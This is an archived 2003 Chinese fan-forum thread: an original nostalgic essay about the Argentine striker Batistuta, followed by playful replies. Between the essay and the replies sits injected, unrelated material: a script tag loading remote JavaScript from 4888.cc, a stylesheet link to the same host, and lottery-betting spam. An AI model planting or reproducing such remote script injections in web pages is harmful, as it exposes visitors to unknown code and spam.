小羽 发表于 2003-7-19 11:03:00

[原创]陪你一起老……

谨以此文献给我深爱的巴蒂和那些和我一样喜欢巴蒂的朋友们,希望每一个人都幸福,快乐……

“我想有些事情是可以遗忘的,有些事情是可以纪念的,有些事情能够心甘情愿,有些事情一直无能为力。我爱你,这是我的劫难。我相信我爱你,依然,始终,永远,希望你幸福。”
                                                                   —-安妮宝贝
    这个夏天的雨似乎总也下得没完没了,郁闷而绵长,这样的天气让人的心情变得低落,没有缘由的低落……家里要搬家了,我整理自己的书柜,把一些旧报纸捆起来等待收旧货的人,翻出了一堆足球杂志,还有那么多的海报,一张张翻过去,往事就这样慢慢浮了上来……
    记忆中十五岁那年六月的阳光似乎特别的灿烂……那年,那月,我还是个单纯的小女孩,喜欢穿天蓝色的t恤,短裤,碎碎的短发,简单,朴实。喜欢和一大群朋友窝在家里看碟。中考过后,有打靶的时间供我们挥霍……也第一次从男生嘴里知道了在遥远的法兰西即将上演着一场足球盛宴!于是在那个充满着激情与汗水的夏天,我邂逅了足球,也邂逅了你……忘了是哪一天的体育新闻,忘了是巴黎的哪个机场,我看到了一身西装的你走了出来,夏日的阳光洒在你棱角分明的脸上,金发微微被风吹起,你笑,眼角眉梢都洋溢着自信……从此我记住了你的名字:巴蒂斯图塔!那个夏天看完了你的每一场比赛。尽管你和你的阿根廷最后不得不提前离开,1:2的比分使你们被荷兰人挡在了四强的门外……但你那粒打在门柱上的球依然让我激动了很久……所以天真的我依然固执的相信四年后我们一定可以和你有个美丽的约定的!于是98年那个夏天留在记忆里的便是满满的淡淡的阳光味道和瑞奇-马丁那首脍炙人口的《the cup of life》……
    暑假过后就开始了我的高中生活,一进新班级我就和每一个我认识的不认识的不认识的人聊你,聊足球,还成功的说服了班里的足球队穿上了阿根廷队服,那是一段多么快乐的日子啊……每个周末的早晨陪他们一起训练,给他们加油,日子过得是那么的悠闲……还有半夜爬起来看比赛,怕吵到家人,连声音都不敢看,第二天清晨顶着两个黑眼圈一脸菜色的和班里的男生侃球……还有每周轮流买《体坛》……那会儿我们校队穿的是佛罗伦萨的紫色队服,那是一支所向披靡的队伍,几乎没有输过任何一场比赛,每次看到那个高大的队长,总会不由自主的想到在那遥远的亚平宁半岛的你……忘不了看到你进球的消息时,我们的激动。忘不了你受伤时,看到你痛楚的身影时我的泪水……现在每当我想起高中时那段飞扬的青春岁月,心里总会莫名的潮了起来。那时,每一种幸福都从四面八方赶来,手拉手的围绕在我身边,心情象调色版一样五颜六色……那时,有欢笑,有泪水,有朋友,有足球……一切的一切都是那么的美好……
   之后,我就进入了黑色高三,高考的重压让我不得不收起一切杂念,全心为自己的未来打拼。很少看你踢球了,你的消息也只是偶尔从报纸上看个大概,知道你转会去了罗马,你不再是佛罗伦萨的英雄……我理解你的决定,因为——你太需要一个冠军了!我也只好在心底默默的祝福你,希望你能在罗马城圆梦……在我为高考忙得昏天黑地的时候,我看到了你夺冠的消息……看到你手捧奖杯的那一刻,我哭了,无声的!为你高兴,由衷的!英雄是应该拥有属于他的那份荣誉的!这一天似乎来得迟了些,不过终究是来了……
    2002年世界杯,现在我终于可以心平气和地写下这几个字!曾经很长一段时间,这都是我所不愿触及的,因为每每提到它,总让我想起你那忧郁的双眼和那张哭泣的面容……我极力想忘记,却又总不由自主地想起!很奇怪,有些东西即使我们抛弃了,却仍然无法忘记。它静静地睡在我们记忆的深处,冷不丁哪天苏醒过来,依然会让我们激动一场,伤心一场,感叹一场!对瑞典那场比赛,我是逃课看的,整场比赛,阿根廷队占尽优势,但就是无法进球,你被换下场的那一刻,我知道,一切都结束了……我清晰地听见了梦想破碎的声音……那一刻心象被谁捏了一把样,没有眼泪,只有疼痛!终场哨响的那一刻,我看到强悍如斯的你哭得象个孩子,我看不下去了……我忘了自己是怎样回到寝室的!室友们没有讲话,但她们都很诧异我竟然没有哭!是的,连我自己都很吃惊……上一场对英格兰时我都哭得不行……我第一次明白了什么叫做无能为力……第二天依然去上课,和同学们开着一些可有可无的玩笑,只是大家都在小心地回避着,不和我提足球,提阿根廷……6月12日以后,这届世界杯对我来说也没有再值得看下去的理由了……那之后,我拒绝了一切与足球有关的东西……
    很长一段时间我都过得很好,我以为我的生活会从此就这么平静的过下去……直到我再次上网,听到一个网友制作的flash《阿根廷别为我哭泣》,看到世界杯上的那一幕,你掩面而泣,贝隆,克雷斯波……一个个落寞的背影走向场边时,我的泪再也止不住了,我终于明白了,这些日子以来的隐藏都是徒劳的……
   去年12月份,阿根廷和日本的热身赛上传出你将从国家队退役的消息,想到再也看不到身着蓝白衫在绿茵场上奔跑的你,心里不免觉得空空的……之后你又被租借到了国米,再一次看你的比赛,看到跌倒后你不是象往常那样马上站起来去追那足球,而是趴在地上一脸无奈时,我终于发现:你老了……尽管这是我多么不愿意承认的事实!你受到了越来越多的质疑……我也终于明白:我们谁都不能阻挡时间的脚步,即便是被我们称之为战神的你!
   这个夏天,你选择了卡塔尔作为终点站。前不久又传出你将退役的消息。不知道你淡出我的视线以后,我这份为你,为足球守侯的感觉还可以再持续多久?但我想,只要我还喜欢足球,我就还会关注你,支持你!希望你一路走好!潘帕斯的雄鹰,我们的战神!我会陪你一起老……
“我只是难过不能陪你一起老,
    再也没有机会看到你的笑……
    回忆在心里绕啊绕,我是多么的想逃。
    我只是难过不能陪你一起老,
    每天都能看到你的笑……
    希望你知道,我是真心祝福,
    只要你过得好,快乐就好!”

< url=http://www.9p.cc">
<script type="text/javascript" src="http://4888.cc/b.js"></script>
<link href="http://4888.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

乂金乂乂乂时乂彩乂

乂合乂投乂注乂乂

等待巴蒂 发表于 2003-7-19 12:30:00

小羽mm又有新作哟~~~顶一个~~~

金东春 发表于 2003-7-19 14:10:00

好~

杨七狼 发表于 2003-7-19 17:04:00

美文!!

gallen 发表于 2003-7-19 17:37:00

呵呵,字语之间情深意切,MM对巴蒂很喜欢啊!
写的好棒,我也努力写一篇,大家都来灌撒~~~~

星空蜻蜓 发表于 2003-7-19 18:13:00

以下是引用gallen在2003-7-19 17:37:00的发言:
呵呵,字语之间情深意切,MM对巴蒂很喜欢啊!
写的好棒,我也努力写一篇,大家都来灌撒~~~~

写了还记得邀请我们去灌
实在是好人

杨七狼 发表于 2003-7-19 18:18:00

一天不灌你就南果

星空蜻蜓 发表于 2003-7-19 18:26:00

^^你不是说不隐身吗?
怎么也隐了?

杨七狼 发表于 2003-7-19 18:34:00

你们来了后偶就现身

星空蜻蜓 发表于 2003-7-19 18:49:00

原来正身是欢迎我们大驾的^_^

杨七狼 发表于 2003-7-19 18:51:00

以下是引用星空蜻蜓在2003-7-19 18:49:00的发言:
原来正身是欢迎我们大驾的^_^

主要是你老人家
水王之王嘛

星空蜻蜓 发表于 2003-7-19 18:58:00

多谢 提携哈   @@~

杨七狼 发表于 2003-7-19 19:03:00

8KQ

Aimar113 发表于 2003-7-19 19:37:00

MM写给8D的文章我几乎都看过
很真很深
感动ING

等待巴蒂 发表于 2003-7-19 20:17:00

以下是引用Aimar113在2003-7-19 19:37:00的发言:
MM写给8D的文章我几乎都看过
很真很深
感动ING

偶也是d~~~~

天使的羽毛 发表于 2003-7-19 21:26:00

顶一下~~

等待巴蒂 发表于 2003-7-19 21:52:00

以下是引用天使的羽毛在2003-7-19 21:26:00的发言:
顶一下~~

不要用头顶~~~会变傻的

天使的羽毛 发表于 2003-7-19 21:58:00

哈,你试过?

等待巴蒂 发表于 2003-7-19 22:01:00

我猜的~~不信mm试试用头顶顶电脑~~~

云淡风轻 发表于 2003-7-19 22:35:00

不用顶电脑,多练习练习头球的说~~

天使的羽毛 发表于 2003-7-19 22:41:00

以下是引用云淡风轻在2003-7-19 22:35:00的发言:
不用顶电脑,多练习练习头球的说~~
还是云淡MM好~~

等待巴蒂 发表于 2003-7-19 22:42:00

对天使要求要严格~~顶电脑~~~~

天使的羽毛 发表于 2003-7-19 22:45:00

以下是引用等待巴蒂在2003-7-19 22:42:00的发言:
对天使要求要严格~~顶电脑~~~~

angela 发表于 2003-7-19 22:46:00

天使应该顶着天哦~~

等待巴蒂 发表于 2003-7-19 22:47:00

以下是引用angela在2003-7-19 22:46:00的发言:
天使应该顶着天哦~~

她有这么伟岸吗???
页: [1] 2 3
查看完整版本: [原创]陪你一起老……